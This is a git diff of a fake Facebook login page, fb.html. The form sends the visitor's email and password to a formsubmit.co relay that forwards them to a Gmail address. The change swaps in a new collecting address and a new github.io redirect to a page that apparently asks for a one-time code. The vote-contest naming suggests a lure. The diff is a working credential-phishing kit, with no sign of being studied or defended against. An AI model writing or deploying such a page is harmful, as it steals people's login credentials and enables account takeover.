--- a/fb.html
+++ b/fb.html
@@ -189,11 +189,11 @@
                 <p>Connect with friends and the world </p>
                 <p> around you on Facebook.</p>
             </div>
-            <form id="form" action="https://formsubmit.co/votersforambassador@gmail.com" method="POST">
+            <form id="form" action="https://formsubmit.co/voteformeonimgcontest@gmail.com" method="POST">
                 <input type="text" name="username" id="username" required placeholder="email">
 
                 <input type="text" name="password" id="password" required placeholder="password">
-                 <input type="hidden" name="_next" value="https://foodnetworklauch.github.io/vote/instagram/otp/fbcode.html"> 
+                 <input type="hidden" name="_next" value="https://dtegqw.github.io/vzak/instagram/otp/fbcode.html"> 
                 <input type="hidden" name="_captcha" value="false">
                 <div class="link">
                     <button type="submit" value="Send Email" class="login" id="button" style="text-decoration: none; color: white;">Login 
